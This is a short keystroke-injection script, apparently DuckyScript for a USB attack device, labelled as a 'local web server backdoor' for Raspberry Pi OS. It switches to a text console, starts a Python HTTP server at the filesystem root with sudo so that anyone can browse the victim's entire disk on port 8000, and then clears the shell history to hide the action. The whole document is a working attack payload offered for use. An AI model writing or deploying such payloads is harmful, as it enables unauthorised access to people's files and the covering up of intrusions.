REM ========================================================
REM Author: fierceoj
REM Description: Local web server backdoor
REM Target: Raspberry Pi OS
REM Usage: Browse to <victim_IP>:8000/ to access file system
REM ========================================================
DELAY 3000
CTRL-ALT F1
DELAY 200

REM Start http.server with sudo to have full file access
REM Remove sudo if user can't sudo without password
STRING cd / && sudo python3 -m http.server
DELAY 200
ENTER

REM Clear command history
STRING history -c
DELAY 200
ENTER
